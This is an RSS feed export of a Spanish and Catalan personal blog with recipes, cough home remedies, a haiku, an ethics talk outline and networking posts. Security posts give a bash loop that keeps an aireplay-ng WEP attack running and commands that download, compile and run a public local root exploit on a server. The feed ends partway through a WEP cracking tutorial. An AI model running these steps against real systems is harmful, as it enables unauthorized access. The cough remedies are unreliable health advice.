		<category><![CDATA[reality hacking]]></category>
		<category><![CDATA[redes sociales]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=382</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p><object width="480" height="300" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="http://blip.tv/play/%2B3KCr5VDAg" /><param name="wmode" value="transparent" /><param name="allowscriptaccess" value="always" /><param name="allowfullscreen" value="true" /><embed width="480" height="300" type="application/x-shockwave-flash" src="http://blip.tv/play/%2B3KCr5VDAg" wmode="transparent" allowscriptaccess="always" allowfullscreen="true" /></object></p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/el-poder-de-las-redes-sociales/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Como dejar de toser por la noche II</title>
		<link>http://blog.javikal.org/como-dejar-de-toser-por-la-noche-ii/</link>
		<comments>http://blog.javikal.org/como-dejar-de-toser-por-la-noche-ii/#comments</comments>
		<pubDate>Tue, 09 Aug 2011 15:07:49 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[home remedies]]></category>
		<category><![CDATA[dejar de toser]]></category>
		<category><![CDATA[vick vaporub]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=356</guid>
		<description><![CDATA[Untarse los pies con vicks vaporub y posteriormente ponerse unos calcetines. Sorprendente pero funciona.]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p>Untarse los pies con vicks vaporub y posteriormente ponerse unos calcetines. Sorprendente pero funciona.</p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/como-dejar-de-toser-por-la-noche-ii/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Dejar de toser por la noche</title>
		<link>http://blog.javikal.org/dejar-de-toser-por-la-noche/</link>
		<comments>http://blog.javikal.org/dejar-de-toser-por-la-noche/#comments</comments>
		<pubDate>Thu, 28 Jul 2011 16:43:40 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[home remedies]]></category>
		<category><![CDATA[de noche]]></category>
		<category><![CDATA[dejar de toser por la noche]]></category>
		<category><![CDATA[toser]]></category>

		<guid isPermaLink="false">http://javikal.org/nova/?p=347</guid>
		<description><![CDATA[Pues sencillamente cortamos una cebolla por la mitad y la dejamos toda la noche encima de nuestra mesita de noche.]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p>Pues sencillamente cortamos una cebolla por la mitad y la dejamos toda la noche encima de nuestra mesita de noche.</p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/dejar-de-toser-por-la-noche/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Pastís de llimona cassolà</title>
		<link>http://blog.javikal.org/pastis-de-llimona-cassola/</link>
		<comments>http://blog.javikal.org/pastis-de-llimona-cassola/#comments</comments>
		<pubDate>Thu, 28 Jul 2011 16:41:42 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[recipes]]></category>
		<category><![CDATA[cassolà]]></category>
		<category><![CDATA[llimona]]></category>
		<category><![CDATA[pastís]]></category>
		<category><![CDATA[pastís de llimona]]></category>

		<guid isPermaLink="false">http://javikal.org/nova/?p=343</guid>
		<description><![CDATA[Ingredients: 1 yogur de llimona, també utilitzarem la mesura del yogur. 2 mesures de sucre 3 mesures de farina 3 ous 1/2 mesura d&#8217;oli suau d&#8217;oliva 1 sobre de levadura[...]]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p><b>Ingredients:</b></p>
<p>1 yogur de llimona, també utilitzarem la mesura del yogur.<br />
2 mesures de sucre<br />
3 mesures de farina<br />
3 ous<br />
1/2 mesura d&#8217;oli suau d&#8217;oliva<br />
1 sobre de levadura </p>
<p><b>Preparació:</b><br />
* Precalentem el forn mentre preparem a uns 170 graus va bé.<br />
* Per fer la barreja agafem un bol amb capacitat per 2l aproximadament, una forquilla va bé per barrejar.<br />
* Recordeu que una mesura = la quantitat que hi quep a un yogur de llimona.<br />
<br />
<code><br />
[1] Fiquem el yougur de llimona i el barrejem amb tres mesures de sucre.<br />
<br />
[2] A continuació li fiquem els 3 ous i barrejem fins que quedi uniforme.<br />
<br />
[3] Despés barrejem tres mesures de farina.<br />
<br />
[4] Ara toca ficar-li el sobre de levadura i una mica més de la meitat d'una mesura d'oli.<br />
<br />
[5] El temps al forn depèn de cada forn... jo li fico entre 30-45 minuts.<br />
<br />
</code><br />
<b>Bond Profit!</b></p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/pastis-de-llimona-cassola/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Flan de cuajada</title>
		<link>http://blog.javikal.org/flan-de-cuajada/</link>
		<comments>http://blog.javikal.org/flan-de-cuajada/#comments</comments>
		<pubDate>Thu, 28 Jul 2011 16:38:09 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[recipes]]></category>
		<category><![CDATA[cuajada]]></category>
		<category><![CDATA[flan]]></category>
		<category><![CDATA[flan de cuajada]]></category>
		<category><![CDATA[recetas de cocina]]></category>

		<guid isPermaLink="false">http://javikal.org/nova/?p=340</guid>
		<description><![CDATA[Ingredientes: 1L de Nata para montar 2 sobres de cuajada 3 cucharadas de azúcar 2 vasos de leche Caramelo líquido Preparación: [1]Poner a cocer 1L de Nata y un vaso[...]]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p><b>Ingredientes:</b></p>
<p>1L de Nata para montar<br />
2 sobres de cuajada<br />
3 cucharadas de azúcar<br />
2 vasos de leche<br />
Caramelo líquido</p>
<p><b>Preparación:</b></p>
<p align="justify">
[1]Poner a cocer 1L de Nata y un vaso de leche.<br />
[2]Aparte, en un vol diluír 1 vaso de leche, 3 cucharadas de azúcar y 2 sobres de cuajada.<br />
[3]Cuando empiece a hervir [1] echar en el mismo cazo [2] y dejarlo un poco todo junto hirviendo (1 o 2 minutos).<br />
[4]En un molde echar caramelo líquido en el fondo a continuación lo que hemos hervido y arriba podemos echar gallaetas maría que harán de base.<br />
[5]Cuando haya enfríado meterlo en la nevera y en 4 horas estará listo.</p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/flan-de-cuajada/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Champiñones al vino blanco</title>
		<link>http://blog.javikal.org/champinones-al-vino-blanco/</link>
		<comments>http://blog.javikal.org/champinones-al-vino-blanco/#comments</comments>
		<pubDate>Thu, 28 Jul 2011 16:36:28 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[recipes]]></category>

		<guid isPermaLink="false">http://javikal.org/nova/?p=337</guid>
		<description><![CDATA[Ingredientes para unas 3-4 personas: - Una botella de vino blanco - 400g de champiñones - 150-200g de Jamón serrano - Una cebolla - Harina Preparación: [1] Doramos los champis[...]]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p><b>Ingredientes para unas 3-4 personas:</b></p>
<p>- Una botella de vino blanco<br />
- 400g de champiñones<br />
- 150-200g de Jamón serrano<br />
- Una cebolla<br />
- Harina</p>
<p><b>Preparación:</b><br />
<code><br />
[1] Doramos los champis (cortados al gusto) con la cebolla (cortada al gusto)      ∞ 8min<br />
[2] Échamos el jamon serrano (cortado al gusto)      ∞ 2min<br />
[3] Échamos media botella de vino o lo que veamos para que quede bien cubierto de vino todo      ∞ titá<br />
[4] Cuando el vino esté caliente echar la harina, 3 o 4 cucharadas de sopera<br />
[5] Dejar reposar a fuego medio controlando el espesor de la salsa que irá quedando  ∞ 10-15min<br />
</code></p>
<p>A comer!</p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/champinones-al-vino-blanco/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ondeandose</title>
		<link>http://blog.javikal.org/ondeandose/</link>
		<comments>http://blog.javikal.org/ondeandose/#comments</comments>
		<pubDate>Tue, 05 Jul 2011 17:46:03 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[haikus]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=333</guid>
		<description><![CDATA[ondeandose, el orgasmo infinito, agua, arena y sol]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p>ondeandose,<br />
el orgasmo infinito,<br />
agua, arena y sol</p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/ondeandose/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Dancing in the dark</title>
		<link>http://blog.javikal.org/dancing-in-the-dark/</link>
		<comments>http://blog.javikal.org/dancing-in-the-dark/#comments</comments>
		<pubDate>Wed, 22 Jun 2011 20:40:56 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[php]]></category>

		<guid isPermaLink="false">http://javikal.org/dancing-in-the-dark/</guid>
		<description><![CDATA[testing wordpress from android mobile phone&#8230;]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p><img style="display:block;margin-right:auto;margin-left:auto;" alt="image" src="http://blog.javikal.org/wp-content/uploads/2011/06/wpid-2011-06-22-223633.jpg" /></p>
<p>testing wordpress from android mobile phone&#8230;</p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/dancing-in-the-dark/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ataques persistentes con aireplay-ng y bash script</title>
		<link>http://blog.javikal.org/ataques-persistentes-con-aireplay-ng-y-bash-script/</link>
		<comments>http://blog.javikal.org/ataques-persistentes-con-aireplay-ng-y-bash-script/#comments</comments>
		<pubDate>Sun, 28 Nov 2010 18:05:16 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[wireless]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=308</guid>
		<description><![CDATA[A lo largo de pruebas y más pruebas, de fracasos y éxitos quizás os sirva lo que a continuación os explico. En un escenario en el que queremos obtener una[...]]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p align="justify">A lo largo de pruebas y más pruebas, de fracasos y éxitos quizás os sirva lo que a continuación os explico. En un escenario en el que queremos obtener una clave WEP donde no tenemos clientes conectados aireplay-ng no ofrece la posibilidad de realizar una falsa autenticación con el punto de acceso, por lo que nosotros mismos podemos ser ese cliente que no está conectado y que nos vendría genial para hacer un ataque Standard ARP-request replay, el famoso -3.</p>
<p align="justify">Pues bien, lo que a continuación os muestro sirve para dejar persistente el ataque de falsa autenticación y mantenernos como un cliente constantemente conectado hasta finalizar el ataque Standard ARP-request replay, es tan sencillo como meter el ataque en un bucle en un script de bash, por ejemplo:</p>
<p><code><br />
#!/bin/bash<br />
#For persistent attacks<br />
while (true)<br />
do<br />
aireplay-ng -e Essid -a MacDelPuntoDeAcceso -1 1 InterfazPromiscua<br />
done<br />
</code></p>
<p align="justify">Este sencillo script nos mantendrá el ataque constantemente incluso cuando caiga lo volverá a iniciar, a mi me ha resultado genial en los escenarios en los que la falsa autenticación funciona a medias y aireplay-ng se va cayendo.</p>
<p>PD ::: haciendo este post encontré este <a href="http://www.seguridadwireless.net/hwagm/manual-aircrack-ng-castellano.html" target="_blank"> manual en castellano de la suite aircrack</a> que quizá también os sirva.</p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/ataques-persistentes-con-aireplay-ng-y-bash-script/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Cloud Computing saludable: eyeos</title>
		<link>http://blog.javikal.org/el-peligro-del-cloud-computing/</link>
		<comments>http://blog.javikal.org/el-peligro-del-cloud-computing/#comments</comments>
		<pubDate>Sun, 28 Nov 2010 17:24:14 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[php]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=288</guid>
		<description><![CDATA[Ultimamente estamos viendo como exponencialmente se empieza ha hablar y utilizar la tecnología del Cloud Computing como un camino hacia el futuro irremediable. A continuación os dejo una charla que[...]]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p align="justify">Ultimamente estamos viendo como exponencialmente se empieza ha hablar y utilizar la tecnología del Cloud Computing como un camino hacia el futuro irremediable. A continuación os dejo una charla que analiza el fenómeno del Cloud Computing y lo peligroso que puede llegar a ser, también presenta una alternativa libre que utiliza la misma tecnología salvaguardando nuestra privacidad: eyesos.</p>
<p><object width="540" height="285"><param name="movie" value="http://www.youtube.com/v/3QLP62qH9hc?fs=1&amp;hl=es_ES"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/3QLP62qH9hc?fs=1&amp;hl=es_ES" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="540" height="285"></embed></object></p>
<p>Web de <a href="http://www.eyeos.org/es/index.php" target="_blank">eyeos.</p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/el-peligro-del-cloud-computing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ética y tecnología</title>
		<link>http://blog.javikal.org/etica-y-tecnologia/</link>
		<comments>http://blog.javikal.org/etica-y-tecnologia/#comments</comments>
		<pubDate>Sun, 06 Jun 2010 18:16:12 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[reality hacking]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=258</guid>
		<description><![CDATA[Con motivo de unas charlas que he dado en un Instituto entorno a la ética y la tecnología publico el siguiente contenido a modo de esquema que me sirvió para[...]]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p align="justify">Con motivo de unas charlas que he dado en un Instituto entorno a la ética y la tecnología publico el siguiente contenido a modo de esquema que me sirvió para abordar el tema entre personas de unos 16-17 años.</p>
<table border="1">
<tr>
<td>
<b>Abstract</b></p>
<p align="justify">
This article tries to make a reflexion about ethics and technology, what is, what responsabilities, dependences have the human being, how and why the technology is changing the society, in what direction? under what context  etc&#8230;
</p>
</td>
</tr>
</table>
<p><b>¿Que es la tecnología?</b><br />
Este primer punto sirve para contextualizar a los alumnos entorno al tratamiento que le vamos a dar a la tecnología, como un conjunto amplio y no reducido de herramientas, su trayectoría historica, que tiene que ver con el ser humano etc&#8230; para hacer más dinámica la contextualización utilicé el siguiente vídeo:</p>
<p><center></p>
<p><object width="480" height="385"><param name="movie" value="http://www.youtube.com/v/_y5xyUNIaUo&#038;hl=en_US&#038;fs=1&#038;"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/_y5xyUNIaUo&#038;hl=en_US&#038;fs=1&#038;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed></object></p>
<p></center></p>
<p>Para seguir con algo dinámico, romper el hielo y animar a los y las alumnas a participar y crear un feedback enriquecedor continué con la presentación de cada una dicéndo su nombre y qué tecnología era la que más utilizaban, me serviría también para luego explicar dos propiedades o <b>características</b> importantes de la tecnología:</p>
<li>Carácter biológico</li>
<p align="justify">
<li>Carece de moral</li>
<p align="justify">
<p align="justify">A partir de la definición está bien improvisar el contenido, estas son algunas preguntas que pueden ayuda a crear debate y reflexión entorno al uso/consumo de tecnología:</p>
<p></p>
<li><b>Necesidad:</b> ¿Necesitamos consumir toda la tecnología que usamos cotidianamente? ¿La tecnología cubre todas nuestras necesidades?</li>
<p></p>
<li><b>Felicidad:</b> ¿La tecnología nos ayuda a ser más felices? ¿Somos más felices ahora que hace 200 años?</li>
<p></p>
<li><b>Libertad:</b> ¿La tecnología nos hace más libres? </li>
<p></p>
<p align="justify"><em>Se ha de tratar de no satanizar la tecnología en el contenido de las reflexiones porque es una expresión de nuestra evolución y quien le inyecta moral y aplicación es el ser humano, es cierto que la contextualización de la sociedad actual puede desgranar y desgrana un recorrido terrorifico de la mano de la tecnología por eso es importante contextualizar también el sistema económico en el que vivimos y en el que se desarrolla la tecnología y su consumo ya que está implicado directamente en el desarrollo tecnológico, también sin satanizarlo pero exponiéndolo para obtener respuestas</em></p>
<p align="justify"><b>¿Hacia donde nos dirigimos?</b></p>
<p>El siguiente video nos puede ayudar a dibujar un futuro:<br />
<center><br />
<embed src="http://blip.tv/play/%2B3K_1UQC" type="application/x-shockwave-flash" width="480" height="390" allowscriptaccess="always" allowfullscreen="true"></embed></center></p>
<p></p>
<p><b>Materiales de interés</b></p>
<p><b>Charlas:</b></p>
<p>http://hackandalus.nodo50.org/ftp/LasMentirasMasFamosasSobreLaPirateria.hack04ndalus.ogg</p>
<p>http://hackandalus.nodo50.org/ftp/Politicas_tecnologias_y_control_global_de_la_poblacion.hack04ndalus.ogg</p>
<p>http://hackandalus.nodo50.org/ftp/Copyleft_frente_al_Copyright.hack04ndalus.ogg</p>
<p>http://hackandalus.nodo50.org/ftp/Software_libre_para_una_sociedad_libre.hack04ndalus.ogg</p>
<p><b>Vídeos:</b></p>
<p>La cara oculta del facebook</p>
<p><iframe width="622" height="467" src="http://www.youtube.com/embed/xzTgIdNW6lg?feature=oembed&#038;wmode=opaque" frameborder="0" allowfullscreen></iframe></p>
<p>En busca de hackers</p>
<p>http://www.webislam.com/?idv=796&#038;ver=ji</p>
<p><b>Webs</b></p>
<p>http://tecnologiaetica.wordpress.com/</p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/etica-y-tecnologia/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Compartir conexión a Internet desde un equipo con wireless</title>
		<link>http://blog.javikal.org/compartir-conexion-a-internet-desde-un-equipo-con-wireless/</link>
		<comments>http://blog.javikal.org/compartir-conexion-a-internet-desde-un-equipo-con-wireless/#comments</comments>
		<pubDate>Sat, 29 May 2010 14:48:52 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[wireless]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=236</guid>
		<description><![CDATA[Este artículo muestra como compartir una conexión a Internet entre dos equipos, el escenario es el siguiente: Equipo 1 Sistema Operativo: Ubuntu GNU/Linux Tarjeta de red inalámbrica: wlan0 Tarjeta de[...]]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p>Este artículo muestra como compartir una conexión a Internet entre dos equipos, el escenario es el siguiente: </p>
<table>
<tr>
<td>
<b>Equipo 1</b><br />
Sistema Operativo: Ubuntu GNU/Linux<br />
Tarjeta de red inalámbrica: wlan0<br />
Tarjeta de red cableada: eth0
</td>
</tr>
<tr>
<td><b>Equipo 2</b><br />
 Sistema Operativo: Windows Xp Professional<br />
Tarjeta de red cableada: Conexión de Area Local</td>
</tr>
</table>
<p>El equipo 1 se conecta a Internet vía Wireless a Internet y comparte la conexión a Internet con otro equipo realizando un puente entre la Tarjeta de red inalámbrica y Tarjeta de red cableada mediante un script de <a href="http://new.taringa.net/posts/ebooks-tutoriales/5457072/Guia-Avanzada-Firewalls-Linux.html" target="_blank">IPTABLES</a>. Una vez realizado el puente los dos equipos se conectan entre sí mediante un cable cruzado RJ-45.</p>
<p>La siguiente imágen muestra el escenario:</p>
<p><center><img src="/imatges/javikal_bridge_wlan0_eth0.png" height="550" width="550"></center></p>
<p>A continuación se exponen las configuraciones en los dos equipos para que esto sea posible.</p>
<table>
<tr>
<td>
En el Equipo 1 la configuración de wlan0 es la que requiera la red en cuestión, es decir la que funciona para salir a Internet.</p>
<p>La configuración de eth0 tiene que tener un rango de IP diferente al de wlan0, por ejemplo si wlan0 tiene de rango 192.168.1.0/24 la siguiente configuración es válida:</p>
<p>eth0<br />
ip 192.168.2.1<br />
netmask 255.255.255.0</p>
<p>osease: <br />
<code>ifconfig eth0 192.168.2.1 netmask 255.255.255.0 up</code>
</td>
</tr>
<tr>
<td>
En el Equipo 2 tenemos que poner un rango igual al de eth0 del otro equipo poniendo como puerta de enlace la IP del equipo que tiene Internet ya que saldremos por éste:<br />
<br />
IP: 192.168.2.222<br />
Máscara de red: 255.255.255.0<br />
Puerta de Enlace: 192.168.2.1 (la ip del otro equipo)<br />
DNS&#8217;s: los que creáis convenientes, aquí tenéis una <a href="http://bandaancha.eu/analizador-dns" target="_blank">lista.</a></p>
</td>
</tr>
</table>
<p>Por último tan solo nos queda ejecutar el script de iptables que nos permite puentear Internet entre las dos tarjetas del equipo 1:</p>
<p>contenido del script:<br />
<code><br />
#!/bin/bash<br />
#Script per fer pont entre wlan0 i eth0 per compartir inet<br />
#Els clients tindran rang 192.168.2.X i gateway 192.168.2.1 possant al pc amb inet 192.168.2.1 d'ip en eth0</p>
<p>## Establecemos politica por defecto<br />
iptables -P INPUT ACCEPT<br />
iptables -P OUTPUT ACCEPT<br />
iptables -P FORWARD ACCEPT<br />
iptables -t nat -P PREROUTING ACCEPT<br />
iptables -t nat -P POSTROUTING ACCEPT</p>
<p># El localhost se deja<br />
/sbin/iptables -A INPUT -i lo -j ACCEPT</p>
<p># Al firewall tenemos acceso también desde la subnet<br />
iptables -A INPUT -s 192.168.2.0/24 -i eth0 -j ACCEPT</p>
<p>#Empezamos a realizar el Puente desde wlan0<br />
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE</p>
<p>#Direccionamos el Puente a eth0<br />
iptables -A INPUT -s 192.168.2.0/24 -i eth0 -j ACCEPT</p>
<p>#Se ejecuta la Orden<br />
echo 1 > /proc/sys/net/ipv4/ip_forward</p>
<p>echo " OK . Verifique que lo que se aplica con: iptables -L -n"</p>
<p># Fin del script</p>
<p></code></p>
<p></p>
<p><code>sh puente.sh</code></p>
<p>Espero que os sirva de ayuda!<br />
Cualquier corrección, duda, aclaración, ampliación, especificación podéis comentar este artículo.</p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/compartir-conexion-a-internet-desde-un-equipo-con-wireless/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Autogestión de las energías renovables</title>
		<link>http://blog.javikal.org/autogestion-de-las-energias-renovables/</link>
		<comments>http://blog.javikal.org/autogestion-de-las-energias-renovables/#comments</comments>
		<pubDate>Thu, 18 Feb 2010 08:39:00 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[reality hacking]]></category>
		<category><![CDATA[energías renovables]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=230</guid>
		<description><![CDATA[Ahí van algunos enlaces muy interesantes para la autogestión de las energías renovables: Desde molinos de viento a hydro turbinas: IR Cocina Solar: IR Casas de paja: IR]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p>Ahí van algunos enlaces muy interesantes para la autogestión de las energías renovables:</p>
<p>Desde molinos de viento a hydro turbinas: <a href="http://www.scoraigwind.com/" target="_BLANK">IR</a></p>
<p>Cocina Solar: <a href="http://www.solare-bruecke.org/Spanish/scheffler_es/scheffler_es.htm" target="_BLANK">IR</a></p>
<p>Casas de paja: <a href="http://www.casasdepaja.org/" target="_BLANK">IR</a></p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/autogestion-de-las-energias-renovables/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Escalando privilegios, obtener una shell de root</title>
		<link>http://blog.javikal.org/escalando-privilegios-obtener-una-shell-de-root/</link>
		<comments>http://blog.javikal.org/escalando-privilegios-obtener-una-shell-de-root/#comments</comments>
		<pubDate>Mon, 18 Jan 2010 10:01:03 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[shell de root]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=159</guid>
		<description><![CDATA[A continuación explicaré muy brevemente una forma sencilla de hacernos con una shell de root en un sistema GNU/Linux a través de un usuario estandard sin privilegios con acceso por[...]]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p align="justify">A continuación explicaré muy brevemente una forma sencilla de hacernos con una shell de root en un sistema GNU/Linux a través de un usuario estandard sin privilegios con acceso por ssh o local shell.</p>
<p>Primero de todo necesitaremos un compilador de C y el siguiente exploit:</p>
<p><code>apt-get install gcc &#038;&#038; wget http://www.milw0rm.com/exploits/9479</code></p>
<p>A continuación compilamos el exploit:</p>
<p><code>gcc 9479.c -o exploit</code></p>
<p>Y lo ejecutamos:</p>
<p><code>./exploit</code></p>
<p align="justify">Si todo ha ido bien dispondremos de una shell de root, a la hora de editar ficheros con vim, por ejemplo, he tenido que forzar la escritura w! por lo demás igual que si fuera root. </p>
<p align="justify">Os recomiendo que compiléis el exploit en el mismo sistema al que queráis escalar, es decir, si quiero utilizar el exploit en una Debian Lenny compilaré previamente el exploit en mi sistema Debian Lenny o máquina virtual en su defecto y posteriormente subir el fichero al servidor y ejecutarlo.</p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/escalando-privilegios-obtener-una-shell-de-root/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WEP cracking en Debian Lenny, el escenario más sencillo</title>
		<link>http://blog.javikal.org/wep-cracking-en-debian-lenny-el-escenario-mas-sencillo/</link>
		<comments>http://blog.javikal.org/wep-cracking-en-debian-lenny-el-escenario-mas-sencillo/#comments</comments>
		<pubDate>Sun, 27 Dec 2009 18:16:57 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[wireless]]></category>
		<category><![CDATA[WEP cracking]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=48</guid>
		<description><![CDATA[Introducción Presentado en 1999, WEP, acrónimo de Wired Equivalent Privacy o &#8220;Privacidad Equivalente a Cableado&#8221;, es un sistema de cifrado que permite cifrar la información que se transmite proporcionando confidencialidad.[...]]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><h3><b>Introducción</b></h3>
<p align="justify">Presentado en 1999, <b>WEP</b>, acrónimo de Wired Equivalent Privacy o &#8220;Privacidad Equivalente a Cableado&#8221;, es un sistema de cifrado que permite cifrar la información que se transmite proporcionando confidencialidad. Existe la posibilidad de cifrar la red mediante un cifrado de 64 o 128 bits. En 2001 se descubrieron varias vulnerabilidades que permiten recomponer la contraseña del algoritmo con el que se cifran los datos de la red pudiendo acceder a ella y ver limpiamente todo el tráfico de ésta.</p>
<p align="justify">Una red Wireless (comunicación inalámbrica, sin cables) se transmite por radiofrecuencia, las comerciales suelen irradiar a <b>2,4GHz</b>, es la misma frecuencia con la que vibra el microondas o el H2O (agua) por eso si entre el emisor y el receptor se encuentra agua en forma de lluvia por ejemplo, las ondas emitidas son absorbidas por el agua dejando al receptor en ascuas. Pensemos en una radio, para escuchar la radio necesitamos un sintonizador y poder así escuchar las diferentes emisoras, con la tecnología Wireless pasa exactamente lo mismo, para poder escuchar (ver los paquetes de otra red) necesitaremos un sintonizador, en este caso, uno que sintonice a una frecuencia de 2,4 GHz. Muchos portátiles los llevan integrados pensando en la movilidad de estos, por eso, podemos ver las diferentes redes Wireless que existen a nuestro alrededor, generalmente las que están transmitiendo a una distancia aproximada 100 metros en los dispositivos comerciales y lo hacen de forma omnidireccional (a la redonda). Para los equipos de sobremesa podemos adquirir una tarjeta de red inalámbrica en nuestro proveedor de hardware favorito o reciclarla de la calle o nuestra deixalleria favorita, alguna placas madre también las llevan integradas. Normalmente cuando abrimos nuestro cliente de redes Wireless nos encontramos que detecta de forma general dos tipos diferentes:</p>
<p align="justify">
<li>Las que <b>no tienen cifrado alguno</b>, estas estas estan totalmente abiertas y si no han dispuesto de otro mecanismo de seguridad como filtrado por MAC podremos acceder a ellas sin contraseña, todos los paquetes que circulen por esta red podrán ser leídos por todo el mundo que la sintonice.</li>
</p>
<p align="justify">
<li>Las que <b>tienen cifrado</b>, el candadito puesto al lado del nombre de la red. De estas hay de varios tipos porque existen diferentes algoritmos de cifrado, encontraréis <b>WEP</b>, WPA, WPA2.</li>
</p>
<p></p>
<p align="justify">Este artículo se refiere a las redes inalámbricas cifradas con WEP y a continuación se explicará como obtener la contraseña del algoritmo de cifrado no sin antes hacer una pequeña reflexión de porque hoy en día a más de 8 años de saberse públicamente la vulnerabilidad de estas redes nuestros proveedores de servicios a los que pagamos siguen vendiendo o alquilándonos sus routers y puntos de acceso con este algoritmo VULNERABLE por defecto dejando nuestra privacidad al alcance de cualquiera que le interese aprender como romper el cifrado. Pues bien, las respuestas que me he dado de el porqué de esta dejadez responden a que los beneficios están por encima de todo y a la funcionalidad total de los productos que ofrecen los ISP.  Cuando me refiero a beneficios me refiero a precariedad laboral y tiempo, actualmente cuando se acerca nuestro instalador de ADSL lo único que tiene que hacer es enchufar el cable de teléfono al router y el RJ-45 a nuestro ordenador como mucho, puesto que si no utilizamos cable de red solo necesitaremos la contraseña para acceder a la red que normalmente se encuentra en la parte inferior del dispositivo. Si utilizamos cable la red inalámbrica suele estar activada también por lo que quedamos expuestos aunque utilicemos cable ya que nuestro dispositivo está emitiendo además por radiofrecuencia, en el caso que el dispositivo sea router + punto de acceso (con antenita). Es decir, por defecto, el dispositivo que nos traen a casa tiene la red inalámbrica activada con WEP y con una contraseña de 